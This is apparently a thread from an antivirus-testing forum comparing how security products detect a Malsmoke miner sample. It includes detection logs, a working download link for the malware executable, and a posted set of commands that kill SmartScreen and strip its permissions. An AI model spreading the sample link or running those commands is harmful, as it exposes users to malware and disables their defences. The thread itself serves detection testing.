#Malsmoke #Miner（7.30）

hsks

https://www.virustotal.com/gui/f ... 732ee15ed/detection

https://pan.huang1111.cn/s/Wmai3

hsks

https://qmumdjffuiocstjfmdqt.com/miner.EXE

#Payload

心心相印

Avira miss

wh759626933

norton kill

dreams521

智量扫描 miss

正在缓冲

Avast miss

Microsoftheihei

md 扫描miss
双击miss md被破坏，直接瘫痪，有点意思

11111111111445

火绒miss

hsks

Microsoftheihei 发表于 2021-7-30 11:43
md 扫描miss
双击miss md被破坏，直接瘫痪，有点意思

takeown /f "%systemroot%\System32\smartscreen.exe" /a
icacls "%systemroot%\System32\smartscreen.exe" /reset
taskkill /im smartscreen.exe /f
icacls "%systemroot%\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18

aboringman

KSC：miss

双击SW杀setup.bat（衍生物，本体没有处理，这个东西很熟悉）

1. Event: Malicious object detected
   
2. Application: Windows Command Processor
   
3. Component: System Watcher
   
4. Result description: Detected
   
5. Type: Trojan
   
6. Name: PDM:Trojan.Win32.Generic
   
7. Threat level: High
   
8. Object type: Process
   
9. Object path: c:\program files (x86)\sun technology network\oracle java se
   
10. Object name: setup.bat
    
11. Reason: Databases
    
12. Databases release date: Today, 7/30/2021 9:34:00 AM

复制代码

忘看了有一个网址，点进去网页监控拦截

1. 检测时间: 2021/7/30 12:43:58
   
2. 
   
3. 网址: hXXps://qmumdjffuiocstjfmdqt(.)com/miner.E%3C...%3E
   
4. 
   
5. 已被网页反病毒阻止
   
6. 
   
7. 原因: 危险网址
   
8. 
   
9. 检测方法: 云保护

复制代码

1. Event: Access denied
   
2. Application name: msedge.exe
   
3. Application path: C:\Program Files (x86)\Microsoft\Edge\Application
   
4. Component: Web Anti-Virus
   
5. Result description: Blocked
   
6. Type: Malicious link
   
7. Name: hxxps://qmumdjffuiocstjfmdqt（.）com/test5.exe
   
8. Precision: Exactly
   
9. Threat level: High
   
10. Object type: Web page
    
11. Object name: test5.exe
    
12. Object path: hxxps://qmumdjffuiocstjfmdqt（.）com
    
13. Reason: Cloud Protection

复制代码